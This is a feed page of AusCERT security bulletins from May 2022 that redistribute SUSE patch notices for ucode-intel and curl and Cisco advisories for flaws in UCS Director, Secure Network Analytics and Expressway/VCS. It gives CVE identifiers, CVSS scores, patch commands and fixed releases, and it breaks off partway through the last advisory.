AusCERT - Security Bulletins

Subscribe to AusCERT - Security Bulletins hírcsatorna
Latest published security bulletins. See https://www.auscert.org.au/rss/ for feed information.
Frissítve: 17 perc 10 másodperc
2022. május 20.

ESB-2022.2455 - [SUSE] ucode-intel: CVSS (Max): 5.3

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2455 Security update for ucode-intel 20 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: ucode-intel Publisher: SUSE Operating System: SUSE Resolution: Patch/Upgrade CVE Names: CVE-2022-21151 Original Bulletin: https://www.suse.com/support/update/announcement/2022/suse-su-20221732-1 Comment: CVSS (Max): 5.3 CVE-2022-21151 (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N) CVSS Source: SUSE Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for ucode-intel ______________________________________________________________________________ Announcement ID: SUSE-SU-2022:1732-1 Rating: moderate References: #1198717 #1199423 Cross-References: CVE-2022-21151 Affected Products: SUSE Linux Enterprise High Performance Computing 15-ESPOS SUSE Linux Enterprise High Performance Computing 15-LTSS SUSE Linux Enterprise Server for SAP 15 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for ucode-intel fixes the following issues: Updated to Intel CPU Microcode 20220510 release. (bsc#1199423) Updated to Intel CPU Microcode 20220419 release. (bsc#1198717) o CVE-2022-21151: Processor optimization removal or modification of security-critical code for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access (bsc#1199423). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE Linux Enterprise Server for SAP 15: zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2022-1732=1 o SUSE Linux Enterprise High Performance Computing 15-LTSS: zypper in -t patch SUSE-SLE-Product-HPC-15-2022-1732=1 o SUSE Linux Enterprise High Performance Computing 15-ESPOS: zypper in -t patch SUSE-SLE-Product-HPC-15-2022-1732=1 Package List: o SUSE Linux Enterprise Server for SAP 15 (x86_64): ucode-intel-20220510-150000.3.74.1 o SUSE Linux Enterprise High Performance Computing 15-LTSS (x86_64): ucode-intel-20220510-150000.3.74.1 o SUSE Linux Enterprise High Performance Computing 15-ESPOS (x86_64): ucode-intel-20220510-150000.3.74.1 References: o https://www.suse.com/security/cve/CVE-2022-21151.html o https://bugzilla.suse.com/1198717 o https://bugzilla.suse.com/1199423 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYobM4skNZI30y1K9AQj84BAArpOBrAnc3LNvjdHESiIvJOlbtVuTNlkR 90RNa2bFxfrniNAW9Hs3cjlt3edgAsinEhAWMvAipt3uCVkbS/DoOv2LET9TK8cB o6FxQefo5XwtscFsf5Y/4bVDiFH1B1CWk0NVJLEzjtCqR7xfLIFoJenkn2Iuvo8p vB8Ol9W3jstB5vE0EDoux623uutM7TfA3k/H0YmUtbZyq7gRee+1FsFNZNH7Ira7 3zMxG8bLQgpBOpPKAKcPhU3gzy1JBplfolKaiP20rstiDoygbiN1Bpssof0arOJL YD3BQYU4y4CLmM2r+Wa9WNaPapPYx36f0aswWF/k4dbsn9zuqADRQAGxVlcf7DlK gK8uG2L/UgD4rTfQc9jaOyexLqYbTd1mp5rH+Nq5Wb0p6oNKzdAgJ4U9teUJhnSh 5uEPdEpXaWFHAmXPvhTs6wkrq+mLA8gvGMtd5VygCFPynijZiCITeh+kTU57vzd8 I2GDNkn/GQLgRWkQ/eZ8PPZCG8sW926bf355mP2HvMadGMiNwA3P4g7KFPXZK37E BK3ovNStRm5HgUirFMiGcpeAGiGwaOtDvuCQOKh40c2TE8TZMsu+CFfntKdyvRB7 pR8PyCj6bAkeF6tdlg7KZqC8JEKHa7S0ETVvkypM+NbdFuljmxXjX8f5WY2VM7rU aXvLkIP9L/Y= =EFt2 -----END PGP SIGNATURE-----
2022. május 20.

ESB-2022.2454 - [SUSE] curl: CVSS (Max): 7.5

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2454 Security update for curl 20 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: curl Publisher: SUSE Operating System: SUSE Resolution: Patch/Upgrade CVE Names: CVE-2022-27782 CVE-2022-27781 Original Bulletin: https://www.suse.com/support/update/announcement/2022/suse-su-20221733-1 Comment: CVSS (Max): 7.5 CVE-2022-27782 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) CVSS Source: SUSE Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for curl ______________________________________________________________________________ Announcement ID: SUSE-SU-2022:1733-1 Rating: important References: #1199223 #1199224 Cross-References: CVE-2022-27781 CVE-2022-27782 Affected Products: HPE Helion Openstack 8 SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP3-BCL SUSE Linux Enterprise Server 12-SP3-LTSS SUSE Linux Enterprise Server for SAP 12-SP3 SUSE OpenStack Cloud 8 SUSE OpenStack Cloud Crowbar 8 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for curl fixes the following issues: o CVE-2022-27781: Fixed CERTINFO never-ending busy-loop (bsc#1199223) o CVE-2022-27782: Fixed TLS and SSH connection too eager reuse (bsc#1199224) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE OpenStack Cloud Crowbar 8: zypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2022-1733=1 o SUSE OpenStack Cloud 8: zypper in -t patch SUSE-OpenStack-Cloud-8-2022-1733=1 o SUSE Linux Enterprise Server for SAP 12-SP3: zypper in -t patch SUSE-SLE-SAP-12-SP3-2022-1733=1 o SUSE Linux Enterprise Server 12-SP3-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2022-1733=1 o SUSE Linux Enterprise Server 12-SP3-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2022-1733=1 o SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2022-1733=1 o HPE Helion Openstack 8: zypper in -t patch HPE-Helion-OpenStack-8-2022-1733=1 Package List: o SUSE OpenStack Cloud Crowbar 8 (x86_64): curl-7.37.0-37.76.1 curl-debuginfo-7.37.0-37.76.1 curl-debugsource-7.37.0-37.76.1 libcurl4-32bit-7.37.0-37.76.1 libcurl4-7.37.0-37.76.1 libcurl4-debuginfo-32bit-7.37.0-37.76.1 libcurl4-debuginfo-7.37.0-37.76.1 o SUSE OpenStack Cloud 8 (x86_64): curl-7.37.0-37.76.1 curl-debuginfo-7.37.0-37.76.1 curl-debugsource-7.37.0-37.76.1 libcurl4-32bit-7.37.0-37.76.1 libcurl4-7.37.0-37.76.1 libcurl4-debuginfo-32bit-7.37.0-37.76.1 libcurl4-debuginfo-7.37.0-37.76.1 o SUSE Linux Enterprise Server for SAP 12-SP3 (ppc64le x86_64): curl-7.37.0-37.76.1 curl-debuginfo-7.37.0-37.76.1 curl-debugsource-7.37.0-37.76.1 libcurl4-7.37.0-37.76.1 libcurl4-debuginfo-7.37.0-37.76.1 o SUSE Linux Enterprise Server for SAP 12-SP3 (x86_64): libcurl4-32bit-7.37.0-37.76.1 libcurl4-debuginfo-32bit-7.37.0-37.76.1 o SUSE Linux Enterprise Server 12-SP3-LTSS (aarch64 ppc64le s390x x86_64): curl-7.37.0-37.76.1 curl-debuginfo-7.37.0-37.76.1 curl-debugsource-7.37.0-37.76.1 libcurl4-7.37.0-37.76.1 libcurl4-debuginfo-7.37.0-37.76.1 o SUSE Linux Enterprise Server 12-SP3-LTSS (s390x x86_64): libcurl4-32bit-7.37.0-37.76.1 libcurl4-debuginfo-32bit-7.37.0-37.76.1 o SUSE Linux Enterprise Server 12-SP3-BCL (x86_64): curl-7.37.0-37.76.1 curl-debuginfo-7.37.0-37.76.1 curl-debugsource-7.37.0-37.76.1 libcurl4-32bit-7.37.0-37.76.1 libcurl4-7.37.0-37.76.1 libcurl4-debuginfo-32bit-7.37.0-37.76.1 libcurl4-debuginfo-7.37.0-37.76.1 o SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): curl-7.37.0-37.76.1 curl-debuginfo-7.37.0-37.76.1 curl-debugsource-7.37.0-37.76.1 libcurl4-32bit-7.37.0-37.76.1 libcurl4-7.37.0-37.76.1 libcurl4-debuginfo-32bit-7.37.0-37.76.1 libcurl4-debuginfo-7.37.0-37.76.1 o HPE Helion Openstack 8 (x86_64): curl-7.37.0-37.76.1 curl-debuginfo-7.37.0-37.76.1 curl-debugsource-7.37.0-37.76.1 libcurl4-32bit-7.37.0-37.76.1 libcurl4-7.37.0-37.76.1 libcurl4-debuginfo-32bit-7.37.0-37.76.1 libcurl4-debuginfo-7.37.0-37.76.1 References: o https://www.suse.com/security/cve/CVE-2022-27781.html o https://www.suse.com/security/cve/CVE-2022-27782.html o https://bugzilla.suse.com/1199223 o https://bugzilla.suse.com/1199224 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYobMFckNZI30y1K9AQjG3w//RO81qxVzQ2h3yHUoDbu+W15hltHmT/i5 acw7Cwz9/s4t5H3mBi5iAwplerQuGxBo4b2CbYIEdMmgfYtmi6e0jYdxqHPWUNEC eIV9YP5BnypWTvHqRxOV3/shbAiLpH/hbd00T8iIfdpY395CPqQKQEKKjkOY8iYZ LGcZlr4Uqv2dxdw3feGgDCHDWT+DavyX3b5hwF60siD7DujR7D/36ef0M8HPmext GeSNWHmTN1NFAZN26iVBZ6umKnFCuzfCOYXSEIdtUWTcl6tybVslaZN9yX6/gwgG /hnSqYg1U42KEUZl1W/qtgJxTyDR4CmuF3pDL2wqcv+WPMDhxSqxBE27KgCDilgb VgjPHYz9SyJgYX8njymjMlm74uR4lG/NeSkpq/woOxwHE/j/V3IYCLMoryQML4tX FQiXyAbm8HQWj3YlL1Y7pEsZuY2jtH0yLCwqAOli4vfEBrPLWKaUS7fiVz3b07HC Pnw15QHdzV5keEVcV5peaEUrMiZG5IyhAO0vYjODeDfR6DLplRYekwidKt/2uixA 4ThX1cTrANMDM1fhtJcCQxBdG6jFZM6Vmbo6Em31Oh9m0lLYqurocTdR1PZ+3yR9 551rKQ5d8Lcm8KISi8mF0ngFLaIGuVMBiKmVC73WB9DyKqhyy3Abd4ioKoFxueqQ TY+8h4EW0zw= =5tVV -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2453 - [Cisco] Cisco UCS Director: CVSS (Max): 4.8

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2453 Cisco UCS Director JavaScript Cross-Site Scripting Vulnerability 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco UCS Director Publisher: Cisco Systems Operating System: Cisco Resolution: Patch/Upgrade CVE Names: CVE-2022-20765 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-UCS-XSS-uQSME3L7 Comment: CVSS (Max): 4.8 CVE-2022-20765 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N) CVSS Source: Cisco Systems Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco UCS Director JavaScript Cross-Site Scripting Vulnerability Priority: Medium Advisory ID: cisco-sa-UCS-XSS-uQSME3L7 First Published: 2022 May 18 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvg92051 CVE Names: CVE-2022-20765 CWEs: CWE-80 Summary o A vulnerability in the web applications of Cisco UCS Director could allow an authenticated, remote attacker to conduct a cross-site scripting attack on an affected system. This vulnerability is due to unsanitized user input. An attacker could exploit this vulnerability by submitting custom JavaScript to affected web applications. A successful exploit could allow the attacker to rewrite web page content, access sensitive information stored in the applications, and alter data by submitting forms. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-UCS-XSS-uQSME3L7 Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco UCS Director. For information about which Cisco software releases were vulnerable at the time of publication, see the Fixed Software section of this advisory. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Indicators of Compromise o The Cisco Security Indicators of Compromise Reference Guide lists commonly observed IoCs, which can help identify devices that may have been impacted by the vulnerability disclosed in this Cisco security advisory. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. Fixed Releases At the time of publication, the release information in the following table (s) was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Cisco UCS Director Release First Fixed Release Earlier than 6 Migrate to a fixed release. 6 6.6 The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory. Exploitation and Public Announcements o The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during the resolution of a Cisco TAC support case. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. Related to This Advisory o Cross-Site Scripting URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-UCS-XSS-uQSME3L7 Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2022-MAY-18 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXMlMkNZI30y1K9AQhEvA/9EyxiE6iTDPS/vqwdaNcFjkEgw+Suaxzh 3CNpRsX0hOJdsdXLttV3oqj+bPtu/qr+u0CUutl3Kw1ByEXubaxrBUx2T3nwGYCV pgmSmrVPMxZFWJOEfrMYBgXza5kHcqotD+22o0mFg+A112an2PJtlUfjQE8N+lyp zhol11EObxjdXK39yQtUB/zs61b4XSMbIBeVMY2oG9FxI7AG5Go0aL/sV9gNQi3w D8SijHzVktdfWS8S0SQPGw+3eBhgXgrstuMtKhh76KnZzYZlEP+xN0hHQxHHctir SRqX48mxy7Z2HJ9J2AQFt7d2I01IchXIwD0yYKWeUKcsGwafT9Zc95WIdn7JRizw 5JZCelSh7BLO1GC0lvjXfzI68+x//khgmS1JxP4pBzL9E9WShLicR2a3pmwPYqH4 PBBYeh/vWoTmhas70GiIweacpa6Waz23tqZXLFKOA/QXjCUTjZIOnPI07J1SXDBg KV7K2Dan6SZt4KY/ya8TCZGEWkF/gHMEUTA07BJYX09IPcfb8ezK8jokbblqcIPJ gYBwv/JqiC50Kud3oPgHoKa9CyqWztvTYm62qdAnIXk8I0dzo0RwE23G+PKg9FnQ CjUeZWZQ2lCfn3RR51Go4pu1M38rC5wm7+f6lxWkbkgptKP0LQ59I2IMDp+xaTfs uybXvW9eynk= =e1uA -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2452 - [Cisco] Cisco Secure Network Analytics: CVSS (Max): 5.5

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2452 Cisco Secure Network Analytics Remote Code Execution Vulnerability 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Secure Network Analytics Publisher: Cisco Systems Operating System: Cisco Resolution: Patch/Upgrade CVE Names: CVE-2022-20797 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-stealth-rce-2hYb9KFK Comment: CVSS (Max): 5.5 CVE-2022-20797 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L) CVSS Source: Cisco Systems Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Secure Network Analytics Remote Code Execution Vulnerability Priority: Medium Advisory ID: cisco-sa-stealth-rce-2hYb9KFK First Published: 2022 May 18 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvz12708 CVE Names: CVE-2022-20797 CWEs: CWE-20 Summary o A vulnerability in the web-based management interface of Cisco Secure Network Analytics, formerly Cisco Stealthwatch Enterprise, could allow an authenticated, remote attacker to execute arbitrary commands as an administrator on the underlying operating system. This vulnerability is due to insufficient user input validation by the web-based management interface of the affected software. An attacker could exploit this vulnerability by injecting arbitrary commands in the web-based management interface. A successful exploit could allow the attacker to make configuration changes on the affected device or cause certain services to restart unexpectedly. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-stealth-rce-2hYb9KFK Attention : Simplifying the Cisco portfolio includes the renaming of security products under one brand: Cisco Secure. For more information, see Meet Cisco Secure . Affected Products o Vulnerable Products At the time of publication, this vulnerability affected Cisco Secure Network Analytics. For information about which Cisco software releases were vulnerable at the time of publication, see the Fixed Software section of this advisory. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability. Workarounds o There are no workarounds that address this vulnerability. Fixed Software o When considering software upgrades , customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page , to determine exposure and a complete upgrade solution. In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers. At the time of publication, the release information in the following table (s) was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerability described in this advisory and which release included the fix for this vulnerability. Cisco Secure Network Analytics First Fixed Release Earlier than 7.4.1 7.4.1 Exploitation and Public Announcements o The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory. Source o This vulnerability was found during internal security testing. Cisco Security Vulnerability Policy o To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy . This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco. URL o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-stealth-rce-2hYb9KFK Revision History o +----------+---------------------------+----------+--------+--------------+ | Version | Description | Section | Status | Date | +----------+---------------------------+----------+--------+--------------+ | 1.0 | Initial public release. | - | Final | 2022-APR-20 | +----------+---------------------------+----------+--------+--------------+ - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: https://auscert.org.au/gpg-key/ iQIVAwUBYoXMh8kNZI30y1K9AQiTeA/+MEfFkOuou87iX0JUkqDZrx7XpydOSy+P gaZ3oBAepTL3FxoU7VGVF/gusYxcLptmSloNFK9dyOybLVyTPraB5GR3jYbvjylB /T+R5DGZ5kEoE7lLflVFVXj+CiD17PPKQMgcKln1Z6JGVyFylB0+tZjgMPyZke45 8PDNZXr7kmpLH97xnk4lxEfljLF6uV660cq0D633qkHOIRhEs8zFRAWCaxcip9oa VJyRnyNXA6hEieHIb1JR/znp8x7aUcs4SIiorBkr5PudCeTJ04YsTSQANTYlcbOi 7Sb67P43bhDHnJE5G0D7P93hKDWRD3xIvT+R2AnfsNL4Baza/xtlmfvZ9+AlxDdO cB9wCLCyegRMg7B6Ia4pmwiz6thHr7dWYS0hTQqyfA3W+lUEyiqJem8zDNFXjKsA FCQieFru2kAirSCXKWf67CNwtaLKC8hpU6tgdvEgjoc/h1yBvfInWRmIf0Mjn89Q 7bgMrtORtJAA8TuXf4a+j1BIMCZi5E4c2SXpkQbjHC1Y491y3lzQuPXLYxbC7qud AgN0FtimfYngcwWBfdJFmhZGhTKwFmDD75FlJTtckhUsU3Z+h/btVDdxI1G9FuFj zJDuHujMCyA59pBTHLVoB7Ku+rFw1l1g4Zv8xkXpzr6AjuYhGDwcJ/1jesfyzktV lCtSx/QxHL8= =2D7u -----END PGP SIGNATURE-----
2022. május 19.

ESB-2022.2451 - [Cisco] Cisco Expressway Series and Cisco TelePresence Video Communication Server: CVSS (Max): 5.5

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2022.2451 Cisco Expressway Series and Cisco TelePresence Video Communication Server Vulnerabilities 19 May 2022 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Cisco Expressway Series and Cisco TelePresence Video Communication Server Publisher: Cisco Systems Operating System: Cisco Resolution: Patch/Upgrade CVE Names: CVE-2022-22807 CVE-2022-20809 CVE-2022-20807 CVE-2022-20806 Original Bulletin: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-bsFVwueV Comment: CVSS (Max): 5.5 CVE-2022-20806 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:L) CVSS Source: Cisco Systems Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:L - --------------------------BEGIN INCLUDED TEXT-------------------- Cisco Expressway Series and Cisco TelePresence Video Communication Server Vulnerabilities Priority: Medium Advisory ID: cisco-sa-expressway-filewrite-bsFVwueV First Published: 2022 May 18 16:00 GMT Version 1.0: Final Workarounds: No workarounds available Cisco Bug IDs: CSCvz71486 CSCwa25061 CSCwa25106 CVE Names: CVE-2022-20806 CVE-2022-20807 CVE-2022-20809 CWEs: CWE-532 CWE-611 CWE-73 Summary o Multiple vulnerabilities in the API and web-based management interfaces of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker to write files or disclose sensitive information on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-bsFVwueV Affected Products o Vulnerable Products At the time of publication, these vulnerabilities affected Cisco Expressway Series and Cisco TelePresence VCS. Note: The default configuration is vulnerable for CVE-2022-20806 and CVE-2022-22807. CVE-2022-22807 only affects Cisco products that have debug logging enabled. For information about which Cisco software releases were vulnerable at the time of publication, see the Fixed Software section of this advisory. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information. Products Confirmed Not Vulnerable Only products listed in the Vulnerable Products section of this advisory are known to be affected by these vulnerabilities. Details o The vulnerabilities are not dependent on one another. Exploitation of one of the vulnerabilities is not required to exploit another vulnerability. In addition, a software release that is affected by one of the vulnerabilities may not be affected by the other vulnerabilities. Details about the vulnerabilities are as follows: CVE-2022-20806: Cisco Expressway Series and Cisco TelePresence VCS Arbitrary File Write Vulnerability A vulnerability in the cluster database API of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker with read / write privileges on the application to obtain sensitive information and cause a partial denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient input validation of user-supplied command arguments. An attacker could exploit this vulnerability by authenticating to the device with read / write privileges and issuing a crafted command. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system at a rate that impacts system performance. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Bug ID(s): CSCvz71486 CVE ID: CVE-2022-20806 Security Impact Rating (SIR): Medium CVSS Base Score: 5.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:L CVE-2022-20807: Cisco Expressway Series and Cisco TelePresence VCS XML External Entity Injection Vulnerability A vulnerability in the file-parsing logic of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote 